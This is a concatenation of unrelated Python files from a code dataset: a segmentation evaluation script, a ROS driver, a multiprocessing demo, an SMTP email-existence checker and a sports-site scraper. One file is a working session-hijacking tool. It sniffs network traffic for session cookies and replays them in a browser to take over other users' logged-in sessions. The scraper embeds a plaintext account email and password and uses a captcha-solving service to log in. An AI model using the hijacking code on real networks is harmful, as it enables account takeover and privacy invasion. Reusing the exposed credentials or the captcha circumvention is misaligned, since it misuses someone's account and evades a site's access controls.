print_function\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.utils.data import Dataset\r\nimport numpy as np\r\nimport glob\r\nimport json\r\nimport os\r\nimport argparse\r\nfrom models.model import PolygonModel\r\nimport torchvision.transforms as transforms\r\nfrom utils import *\r\nclass Ade20K(Dataset):\r\n def __init__(self, path=None, seq_len=71, transform=None):\r\n super(Ade20K, self).__init__()\r\n self.path = path\r\n self.seq_len = seq_len\r\n self.transform = transform\r\n # print(self.transform)\r\n self.img_path = '/data/duye/ADE20K/validation/'\r\n self.lbl_path = '/data/duye/ADE20K/val_new/label/*.png'\r\n self.labels = glob.glob(self.lbl_path)\r\n # print(self.labels)\r\n self.total_count = len(self.labels)\r\n\r\n def __len__(self):\r\n return self.total_count\r\n\r\n def __getitem__(self, index):\r\n label = Image.open(self.labels[index])\r\n label_index = self.labels[index].split('_')[2]\r\n # 相应的txt文件\r\n txt_file = '/data/duye/ADE20K/val_new/img/img_' + label_index + '.txt'\r\n # print(txt_file)\r\n # 打开txt获取相应的img路径\r\n with open(txt_file, \"r\") as f: # 打开文件\r\n img_path = f.readline().replace('\\n', '') # 读取文件\r\n # 提取路径\r\n img_path = self.img_path + img_path[36:]\r\n # print('img_path:', img_path)\r\n # 提取文件\r\n img = Image.open(img_path).convert('RGB')\r\n\r\n W = img.width\r\n H = img.height\r\n # 根据label\r\n label = np.array(label) # (H, W)\r\n Hs, Ws = np.where(label == np.max(label))\r\n minH = np.min(Hs)\r\n maxH = np.max(Hs)\r\n minW = np.min(Ws)\r\n maxW = np.max(Ws)\r\n curW = maxW - minW\r\n curH = maxH - minH\r\n extendrate = 0.1\r\n extendW = int(round(curW * extendrate))\r\n extendH = int(round(curH * extendrate))\r\n leftW = np.maximum(minW - extendW, 0)\r\n leftH = np.maximum(minH - extendH, 0)\r\n rightW = np.minimum(maxW + extendW, W)\r\n rightH = np.minimum(maxH + extendH, H)\r\n objectW = rightW - leftW\r\n objectH = rightH - leftH\r\n # print(leftH, rightH, leftW, rightW)\r\n img_new = img.crop(box=(leftW, leftH, rightW, rightH)).resize((224, 224), Image.BILINEAR)\r\n img_new = self.transform(img_new)\r\n left_WH = [leftW, leftH]\r\n object_WH = [objectW, objectH]\r\n origion_WH = [W, H]\r\n # 记录Object WH / WH /left WH\r\n gt = label\r\n WH = {'left_WH': left_WH, 'object_WH': object_WH, 'origion_WH': origion_WH}\r\n return img_new, gt, WH\r\n\r\ndef loadAde20K(batch_size, shuffle=False):\r\n \"\"\"\r\n\r\n :param path: train/test/val,数据集名\r\n :param data_num: 实际无用的..\r\n :param len_s: step_num, max-num of vertex,\r\n Based on this statistics, we choose a hard limit of 70 time steps for our RNN,\r\n taking also GPU memory requirements into account.\r\n :param batch_size: bs\r\n :return: dataloader, (bs, img_tensor, first, yt-2,yt-1, label_index)\r\n \"\"\"\r\n transform = transforms.Compose([transforms.ToTensor(), ])\r\n Ade = Ade20K(transform=transform)\r\n dataloader = DataLoader(Ade, batch_size=batch_size, shuffle=shuffle,\r\n drop_last=False)\r\n print('DataLoader complete!', dataloader)\r\n return dataloader\r\n\r\n# 测试得分\r\ndevices = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n\r\ndef get_score_ADE20K(saved=False, maxnum=float('inf')):\r\n model = PolygonModel(predict_delta=True).to(devices)\r\n pre = 'ResNext_Plus_RL2_retain_Epoch1-Step4000_ValIoU0.6316584628283326.pth'\r\n dirs = '/data/duye/pretrained_models/FPNRLtrain/' + pre\r\n model.load_state_dict(torch.load(dirs))\r\n model.eval()\r\n\r\n iou = []\r\n print('starting.....')\r\n img_PATH = '/data/duye/ADE20K/validation/'\r\n lbl_path = 
'/data/duye/ADE20K/val_new/label/*.png'\r\n labels = glob.glob(lbl_path)\r\n for label in labels:\r\n name = label\r\n label = Image.open(label)\r\n label_index = name.split('_')[2]\r\n # 相应的txt文件\r\n txt_file = '/data/duye/ADE20K/val_new/img/img_' + label_index + '.txt'\r\n with open(txt_file, \"r\") as f: # 打开文件\r\n img_path = f.readline().replace('\\n', '') # 读取文件\r\n # 提取路径\r\n img_path = img_PATH + img_path[36:]\r\n # raw image\r\n img = Image.open(img_path).convert('RGB')\r\n W = img.width\r\n H = img.height\r\n # 根据label\r\n label = np.array(label) # (H, W)\r\n Hs, Ws = np.where(label == np.max(label))\r\n minH = np.min(Hs)\r\n maxH = np.max(Hs)\r\n minW = np.min(Ws)\r\n maxW = np.max(Ws)\r\n curW = maxW - minW\r\n curH = maxH - minH\r\n extendrate = 0.10\r\n extendW = int(round(curW * extendrate))\r\n extendH = int(round(curH * extendrate))\r\n leftW = np.maximum(minW - extendW, 0)\r\n leftH = np.maximum(minH - extendH, 0)\r\n rightW = np.minimum(maxW + extendW, W)\r\n rightH = np.minimum(maxH + extendH, H)\r\n objectW = rightW - leftW\r\n objectH = rightH - leftH\r\n # print(leftH, rightH, leftW, rightW)\r\n # img_new = img.crop(box=(leftW, leftH, rightW, rightH)).resize((224, 224), Image.BILINEAR)\r\n I = np.array(img)\r\n I_obj = I[leftH:rightH, leftW:rightW, :]\r\n # To PIL image\r\n I_obj_img = Image.fromarray(I_obj)\r\n # resize\r\n I_obj_img = I_obj_img.resize((224, 224), Image.BILINEAR)\r\n I_obj_new = np.array(I_obj_img) # (H, W, C)\r\n I_obj_new = I_obj_new.transpose(2, 0, 1) # (C, H, W)\r\n I_obj_new = I_obj_new / 255.0\r\n I_obj_tensor = torch.from_numpy(I_obj_new) # (C, H, W)\r\n I_obj_tensor = torch.tensor(I_obj_tensor.unsqueeze(0), dtype=torch.float).cuda()\r\n\r\n color = [np.random.randint(0, 255) for _ in range(3)]\r\n color += [100]\r\n color = tuple(color)\r\n\r\n with torch.no_grad():\r\n pre_v2 = None\r\n pre_v1 = None\r\n result_dict = model(I_obj_tensor, pre_v2, pre_v1, mode='test', temperature=0.0) # (bs, seq_len)\r\n\r\n # [0, 224] index 0: only one sample in mini-batch here\r\n pred_x = result_dict['final_pred_x'].cpu().numpy()[0]\r\n pred_y = result_dict['final_pred_y'].cpu().numpy()[0]\r\n pred_lengths = result_dict['lengths'].cpu().numpy()[0]\r\n pred_len = np.sum(pred_lengths) - 1 # sub EOS\r\n vertices1 = []\r\n\r\n scaleW = 224.0 / float(objectW)\r\n scaleH = 224.0 / float(objectH)\r\n # Get the pred poly\r\n for i in range(pred_len):\r\n vert = (pred_x[i] / scaleW + leftW,\r\n pred_y[i] / scaleH + leftH)\r\n vertices1.append(vert)\r\n img1 = Image.new('L', (W, H), 0)\r\n ImageDraw.Draw(img1).polygon(vertices1, outline=1, fill=1)\r\n pre_mask = np.array(img1) # (H, W)\r\n\r\n if saved:\r\n try:\r\n drw = ImageDraw.Draw(img, 'RGBA')\r\n drw.polygon(vertices1, color)\r\n except TypeError:\r\n continue\r\n\r\n gt_mask = np.array(label)\r\n gt_mask[gt_mask == 255] = 1\r\n filt = np.sum(gt_mask)\r\n if filt <= 20*20:\r\n continue\r\n intersection = np.logical_and(gt_mask, pre_mask)\r\n union = np.logical_or(gt_mask, pre_mask)\r\n nu = np.sum(intersection)\r\n de = np.sum(union)\r\n # 求IoU\r\n iiou = nu / (de * 1.0) if de != 0 else 0.\r\n iou.append(iiou)\r\n\r\n iou.sort()\r\n iou.reverse()\r\n\r\n print(iou)\r\n print(len(iou))\r\n\r\n print('IoU:', np.mean(np.array(iou)))\r\n\r\nif __name__ == '__main__':\r\n get_score_ADE20K()\r\n\r\n # parse = argparse.ArgumentParser(description='测试在Ade20K上的泛化得分')\r\n # parse.add_argument('-p', '--pretrained', type=str, default=None)\r\n # args = parse.parse_args()\r\n # pre = args.pretrained\r\n #\r\n #\r\n # model 
= PolygonModel(predict_delta=True).to(devices)\r\n # pre = 'ResNext_Plus_RL2_retain_Epoch1-Step4000_ValIoU0.6316584628283326.pth'\r\n # dirs = '/data/duye/pretrained_models/FPNRLtrain/' + pre\r\n # model.load_state_dict(torch.load(dirs))\r\n # model.eval()\r\n # loader = loadAde20K(batch_size=1)\r\n # iou = []\r\n # print('starting.....')\r\n # for index, batch in enumerate(loader):\r\n # print('index: ', index)\r\n # img = batch[0]\r\n # WH = batch[-1] # WH_dict\r\n # left_WH = WH['left_WH']\r\n # origion_WH = WH['origion_WH']\r\n # object_WH = WH['object_WH']\r\n # gt = batch[1]\r\n # bs = img.shape[0]\r\n # scaleW = 224.0 / float(object_WH[0][0]) # 这里错了?!!!! 竟然会出来0,1啊啊啊,那么可能其他的也会错啊啊啊\r\n # scaleH = 224.0 / float(object_WH[1][0])\r\n # leftW = float(left_WH[0][0])\r\n # leftH = float(left_WH[1][0])\r\n # W = origion_WH[0][0]\r\n # H = origion_WH[1][0]\r\n # with torch.no_grad():\r\n # pre_v2 = None\r\n # pre_v1 = None\r\n # result_dict = model(img.to(devices),\r\n # pre_v2,\r\n # pre_v1,\r\n # mode='test',\r\n # temperature=0.0) # (bs, seq_len)\r\n # pred_x = result_dict['final_pred_x'].cpu().numpy()[0]\r\n # pred_y = result_dict['final_pred_y'].cpu().numpy()[0]\r\n # pred_lengths = result_dict['lengths'].cpu().numpy()[0]\r\n # pred_len = np.sum(pred_lengths) - 1 # sub EOS\r\n # vertices1 = []\r\n # # Get the pred poly\r\n # for i in range(pred_len):\r\n # vert = (pred_x[i] / scaleW + leftW,\r\n # pred_y[i] / scaleH + leftH)\r\n # vertices1.append(vert)\r\n # gt_mask = np.array(batch[1][0])\r\n # # 这个可能不对?\r\n # gt_mask[gt_mask == 255] = 1\r\n #\r\n # # pre mask\r\n # img1 = Image.new('L', (W, H), 0)\r\n # ImageDraw.Draw(img1).polygon(vertices1, outline=1, fill=1)\r\n # pre_mask = np.array(img1) # (H, W)\r\n # # get iou\r\n # intersection = np.logical_and(gt_mask, pre_mask)\r\n # union = np.logical_or(gt_mask, pre_mask)\r\n # nu = np.sum(intersection)\r\n # de = np.sum(union)\r\n # # 求IoU\r\n # iiou = nu / (de * 1.0) if de != 0 else 0.\r\n # iou.append(iiou)\r\n #\r\n # iou.sort()\r\n # iou.reverse()\r\n # print('--------------------------------------')\r\n # # print(iou)\r\n # # print(len(iou))\r\n #\r\n # print('IoU:', np.mean(np.array(iou)))\r\n\r\n\r\n# 1. 
IoU: 0.7144151423515942\r\n","sub_path":"DataUtils/ADE20K.py","file_name":"ADE20K.py","file_ext":"py","file_size_in_byte":10773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"510609307","text":"#!/usr/bin/env python\nimport time\nfrom tf.transformations import euler_from_quaternion\nimport rospy\nimport tf2_ros\nimport geometry_msgs\nfrom geometry_msgs.msg import Twist\nimport math\nimport tf_conversions\nglobal br\nglobal t\nglobal pub\nfrom geometry_msgs.msg import PoseStamped\nglobal pose_final\nglobal pose_atual\nglobal orientation\nfrom gazebo_msgs.msg import ModelStates\n\n\ndef reMap(value, maxInput, minInput, maxOutput, minOutput):\n\n\tvalue = maxInput if value > maxInput else value\n\tvalue = minInput if value < minInput else value\n\n\tinputSpan = maxInput - minInput\n\toutputSpan = maxOutput - minOutput\n\n\tscaledThrust = float(value - minInput) / float(inputSpan)\n\n\treturn minOutput + (scaledThrust * outputSpan)\n\n\n\n\ndef messageReceivedCallback(message):\n global pose_final\n global pose_atual\n global t\n\n\n\n\n tfBuffer = tf2_ros.Buffer()\n listener = tf2_ros.TransformListener(tfBuffer)\n\n rate = rospy.Rate(100)\n while not rospy.is_shutdown():\n\n # lookup_transform vai buscar a transformada entre os referencias que nos dissermos\n\n try:\n trans = tfBuffer.lookup_transform(\"World\",\"p_dcoelho/odom\", rospy.Time())\n print('dey')\n except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):\n rate.sleep()\n continue\n # print(trans.transform.translation)\n x = trans.transform.translation.x\n y = trans.transform.translation.y\n break\n\n #Primeiro tenho de saber a posicao do p_dcoelho em relacao ao world, e depois a que somo estas coordenadas,\n #pois estas coordenadas sao do ponto relativamente ao odom\n\n #print('Posicao' + str(x) + 'Posicao' + str(y))\n\n\n #Aqui sei para onde quero ir!\n\n message.pose.position.x=message.pose.position.x + x\n message.pose.position.y = message.pose.position.y + y\n pose_final = message.pose\n #print('Para onde vou')\n #print(pose_final)\n t = 1\n find_z_orientation()\n\n\ndef pose_now(message):\n global pose_final\n global pose_atual\n global t\n global q\n\n global x\n global y\n global theta\n\n x = message.pose[2].position.x\n y = message.pose[2].position.y\n\n rot_q = message.pose[2].orientation\n (roll, pitch, theta) = euler_from_quaternion([rot_q.x, rot_q.y, rot_q.z, rot_q.w])\n q=1\n\n\n '''\n q=1\n\n pose_atual = message.pose[2]\n # print(message.twist)\n # print(Message_Pose)\n\n #print('Onde estou')\n #print(pose_atual)\n #print(pose_atual.orientation)\n '''\n\n #return pose_atual\n\n\ndef find_z_orientation():\n global pose_final\n global pose_atual\n global orientation\n global roll, pitch, yaw\n orientation_q = pose_final.orientation\n orientation_list = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w]\n (roll, pitch, yaw) = euler_from_quaternion(orientation_list)\n print(yaw)\n\n #print(math.degrees(orientation))\n\n #return orientation\n\ndef rotate_until_z():\n global pub\n global pose_atual\n global pose_final\n global orientation\n twist = Twist()\n\n while not rospy.is_shutdown():\n inc_x = pose_final.position.x - x\n inc_y = pose_final.position.y - y\n\n print('atual' + str(theta))\n\n\n angle_to_goal = math.atan2(inc_y, inc_x)\n print('final' + str(angle_to_goal))\n\n if abs(angle_to_goal - theta) > 0.1:\n twist.linear.x = 0.0\n twist.angular.z = 0.3\n else:\n twist.linear.x = 0.5\n 
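# heading is aligned with the goal: drive forward and stop turning\n            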
twist.angular.z = 0.0\n\n pub.publish(twist)\n rospy.sleep(0.5)\n\n\n\n\n\n\n\n\n\n\n\n\n\n '''\n print('rotating')\n twist = Twist()\n twist.linear.x = 0.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z =0.2\n\n pub.publish(twist)\n\n\n #print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')\n #print(orientation)\n\n\n while True:\n\n print(\"orientacao=\" + str(orientation))\n print(\"Z=\" + str(pose_atual.orientation.z))\n (roll,pitch,yaw)=euler_from_quaternion(pose_atual.orientation)\n print(\"YAW \" + str(yaw))\n\n time.sleep(0.5)\n \n if pose_atual.orientation.z>0.93 * orientation and pose_atual.orientation.z<1.07 * orientation:\n twist = Twist()\n twist.linear.x = 0.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = 0.0\n\n pub.publish(twist)\n #print('ORIENTACAO APONTADAAAAAAAAAAAAAAAAAA')\n break\n'''\n\ndef straigth_line():\n #print('LINHA DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDIRRRRRRRRRRRRRRRRRRRRRETTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTAAAAAAAAAAAAAAAAAAAAAAAAAAAA')\n global pub\n twist = Twist()\n twist.linear.x = 0.1\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = 0.0\n pub.publish(twist)\n\n\n\n\n\n\n\n\n\ndef main():\n global br\n global t\n global pub\n global q\n t=0\n\n pub = rospy.Publisher('p_dcoelho/cmd_vel', Twist, queue_size=10)\n\n rospy.init_node('driver', anonymous=False)\n rospy.Subscriber(\"/move_base_simple/goal\", PoseStamped, messageReceivedCallback)\n rospy.Subscriber(\"/gazebo/model_states\", ModelStates, pose_now)\n\n\n while True:\n\n if t==1 and q==1:\n\n orientation = find_z_orientation()\n\n rotate_until_z()\n\n\n rospy.spin()\n \n\n\n\n\n\n print('a')\n\n\n\n\n\n\n\n\n\n\n rospy.sleep(5)\n\n straigth_line()\n\n print('end')\n break\n\n\n\n\n\n\n\n\n return\n rospy.spin()\n\n #pub = rospy.Publisher('p_dcoelho/cmd_vel', Twist, queue_size=10)\n #rate = rospy.Rate(50) # 10hz\n '''\n try:\n\n while not rospy.is_shutdown():\n\n twist = Twist()\n twist.linear.x = 1.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = -1.0\n\n pub.publish(twist)\n\n rate.sleep()\n\n\n except:\n\n twist = Twist()\n twist.linear.x = 0.0\n twist.linear.y = 0.0\n twist.linear.z = 0.0\n twist.angular.x = 0.0\n twist.angular.y = 0.0\n twist.angular.z = 0.0\n pub.publish(twist)\n\n '''\n\nif __name__ == '__main__':\n main()\n","sub_path":"Parte13/p_dcoelho_core/src/driver2.py","file_name":"driver2.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"543111343","text":"#!/usr/bin/env python3\n# Paweł Rubin 2019\n#\n\"\"\"Session hijacking tool.\"\"\"\nfrom typing import List\nfrom argparse import ArgumentParser\n\nimport pyshark\nfrom selenium import webdriver\n\n\ndef parse_cookies(cookies: str) -> List[dict]:\n \"\"\"Returns list of cookies in form {\"name\": , \"value\": }\"\"\"\n return [\n {\"name\": cookie[0], \"value\": cookie[1]}\n for cookie in [cookie.split(\"=\") for cookie in cookies.split(\"; \")]\n ]\n\n\nclass SessionCookieNotFoundError(Exception):\n \"\"\"Raised when http cookies do not contain session cookie.\"\"\"\n\n\ndef get_session_cookie(cookies: str) -> dict:\n \"\"\"Return session cookie from http.cookies.\n Raises SessionCookieNotFoundError\"\"\"\n try:\n return next(\n 
cookie\n for cookie in parse_cookies(cookies)\n if cookie[\"name\"] == \"JSESSIONID\" or cookie[\"name\"] == \"PHPSESSID\"\n )\n except StopIteration:\n raise SessionCookieNotFoundError()\n\n\ndef hijack_session(interface):\n \"\"\"Listens on given interface until session cookie has been found.\n Opens Firefox webdriver with the cookie.\"\"\"\n capture = pyshark.LiveCapture(\n interface=interface, display_filter=\"http.cookie || http.cookie_pair\"\n )\n\n for packet in capture.sniff_continuously():\n try:\n base_url = packet.http.referer\n session_cookie = get_session_cookie(packet.http.cookie)\n browser = webdriver.Firefox()\n browser.get(base_url)\n browser.add_cookie(session_cookie)\n browser.refresh()\n break\n except (AttributeError, SessionCookieNotFoundError):\n continue\n\ndef parse_cli():\n \"\"\"Parses command line arguments.\"\"\"\n parser = ArgumentParser()\n\n parser.add_argument(\n \"--interface\",\n \"-i\",\n type=str,\n required=True,\n help=\"Network interface name.\",\n )\n\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = parse_cli()\n hijack_session(args.interface)\n","sub_path":"l02/hijack_session.py","file_name":"hijack_session.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"619530663","text":"import re\nimport dns.resolver\nimport socket\nimport smtplib\n\n\ndef verify(address, email):\n toVerify = address\n match = re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$', toVerify)\n\n if match is None:\n print('Invalid syntax')\n raise ValueError('Could not verify email address provided')\n\n # run the address through a dns resolver and return a MX record as exchanged in a string format\n records = dns.resolver.query(toVerify, 'MX')\n mxr = records[0].exchange\n mxr = str(mxr)\n\n # running a check to make sure that the email address actually exists\n\n host = socket.gethostname()\n server = smtplib.SMTP()\n server.set_debuglevel(0)\n\n # handle the conversation with the MX record\n server.connect(mxr)\n server.helo(host) # gotta be friendly\n server.mail(email)\n code, message = server.rcpt(str(toVerify))\n server.quit()\n\n # 250 will be a success...hopefully\n\n if code == 250:\n print('Email address {0} is valid!'.format(toVerify))\n else:\n print('Email address {0} is invalid!'.format(toVerify))","sub_path":"verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"599075738","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# @File : multiprocessing_test.py\n# @Time : 2019/2/26 21:47\n# @Author : MaiXiaochai\n# @Site : https://github.com/MaiXiaochai\n\nimport time\nimport multiprocessing\nfrom concurrent.futures import ProcessPoolExecutor\n\n\ndef get_html(n):\n time.sleep(n)\n print(\"sub process success\")\n return n\n\n\ndef main_pool():\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\n # 异步提交任务\n # result = pool.apply_async(get_html, args=(3, ))\n #\n # # 等待所有任务执行完成,完成后就可以得到result数据了\n # pool.close()\n # pool.join()\n # print(result.get())\n \"\"\"\n out:\n sub process success\n 3\n \"\"\"\n\n # # imap 与线程池中的map和Python中的map类似,结果按序返回\n # for result in pool.imap(get_html, [1, 5, 3]):\n # print(\"{} sleep success\".format(result))\n \"\"\"\n out:\n sub process success\n 1 sleep success\n sub process success\n sub process success\n 5 sleep success\n 3 sleep 
success\n \"\"\"\n\n # imap_unordered 谁先完成,打印谁的结果\n for result in pool.imap_unordered(get_html, [1, 5, 3]):\n print(\"{} sleep success\".format(result))\n \"\"\"\n out:\n sub process success\n 1 sleep success\n sub process success\n 3 sleep success\n sub process success\n 5 sleep success\n \"\"\"\n\n\ndef main():\n process = multiprocessing.Process(target=get_html, args=(2, ))\n print(process.pid)\n process.start()\n print(process.pid)\n process.join()\n print(\"main progress end\")\n \"\"\"\n out:\n None\n 10000\n sub process success\n main progress end\n \"\"\"\n\n\nif __name__ == \"__main__\":\n main_pool()\n\n\n","sub_path":"expert_python/src/multiprocessing_test.py","file_name":"multiprocessing_test.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"291363482","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport re\r\nimport csv\r\nimport time\r\nimport random\r\nimport requests\r\nfrom lxml import etree\r\nfrom datetime import datetime\r\nfrom selenium import webdriver\r\n# from chaojiying import Chaojiying_Client\r\n\r\nclass Selenium_Middleware(object):\r\n\r\n def __init__(self):\r\n self.chromeOptions = self.get_chrome()\r\n self.browser = self.get_browser()\r\n\r\n def get_chrome(self):\r\n chromeOptions = webdriver.ChromeOptions()\r\n chromeOptions.add_argument('--headless')\r\n chromeOptions.add_argument('--disable-gpu')\r\n chromeOptions.add_argument('window-size=1280,800')\r\n chromeOptions.add_argument(\"--no-sandbox\")\r\n chromeOptions.add_argument('blink-settings=imagesEnabled=false')\r\n return chromeOptions\r\n\r\n def get_browser(self):\r\n browser = webdriver.Chrome(chrome_options=self.chromeOptions)\r\n browser.set_page_load_timeout(10)\r\n browser.set_script_timeout(10)\r\n return browser\r\n\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\n\r\nclass Dszuqiu(Selenium_Middleware):\r\n def __init__(self):\r\n self.session = self.session()\r\n self.headers = self.headers()\r\n self.headers2 = self.headers2()\r\n super().__init__()\r\n\r\n def session(self):\r\n session = requests.session()\r\n session.keep_alive = False\r\n session.adapters.DEFAULT_RETRIES = 10\r\n return session\r\n\r\n def headers(self):\r\n headers = {\r\n \"User-Agent\": random.choice([\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60\",\r\n \"Opera/8.0 (Windows NT 5.1; U; en)\",\r\n \"Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50\",\r\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.50\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\",\r\n \"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10 Gecko / 20100922Ubuntu / 10.10(maverick)Firefox / 3.6.10\",\r\n # Safari\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2\",\r\n # chrome\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36\",\r\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11\",\r\n \"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16\",\r\n # 360\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; 
Trident/7.0; rv:11.0) like Gecko\", # 淘宝浏览器\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11\",\r\n # 猎豹浏览器\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER\",\r\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)\",\r\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)\",\r\n # QQ浏览器\r\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)\",\r\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)\",\r\n # sogou浏览器\r\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0\",\r\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)\",\r\n # maxthon浏览器\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36\",\r\n # UC浏览器\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.0.3214.0 Safari/537.36\",\r\n ]),\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Accept-Language': 'en-US,en;q=0.5',\r\n 'Connection': 'keep-alive',\r\n 'Upgrade-Insecure-Requests': '1',\r\n }\r\n return headers\r\n\r\n def headers2(self):\r\n headers2 = {\r\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Accept-Language': 'en-US,en;q=0.5',\r\n 'Connection': 'keep-alive',\r\n 'Upgrade-Insecure-Requests': '1',\r\n 'Cookie': ''\r\n }\r\n return headers2\r\n\r\n def login(self):\r\n login_url = 'https://www.dszuqiu.com/w_login'\r\n captcha_url = 'https://www.dszuqiu.com/captcha'\r\n resp = self.session.get(captcha_url, headers=self.headers, timeout=30, verify=False)\r\n print(resp.status_code)\r\n path = os.path.dirname(os.path.abspath(__file__))\r\n open(f\"{path}/img/football.png\", 'wb').write(resp.content)\r\n im = open(f'{path}/img/football.png', 'rb').read()\r\n chaojiying = Chaojiying_Client()\r\n code = chaojiying.PostPic(im, 1006)\r\n result = code[\"pic_str\"].lower()\r\n print('验证码识别结果为:', result)\r\n data = {\r\n \"zhanghu\": 'foreign.trade1@cibsc.biz',\r\n \"password\": '11223344o',\r\n \"captcha_input\": result,\r\n \"rememberMe\": '1',\r\n \"is_ajax\": '1'\r\n }\r\n response = self.session.post(login_url, headers=self.headers, data=data)\r\n print(response.status_code)\r\n cookie = requests.utils.dict_from_cookiejar(self.session.cookies)\r\n return cookie\r\n\r\n def biaodan(self,lsID, start_page, end_page):\r\n for page in range(start_page, end_page+1):\r\n index_url = f\"https://www.dszuqiu.com/league/{lsID}/p.{page}?type=ended_race\"\r\n res = self.session.get(index_url, headers=self.headers, timeout=30, verify=False)\r\n print('第一次请求:', res.status_code)\r\n if res.status_code == 200:\r\n html = 
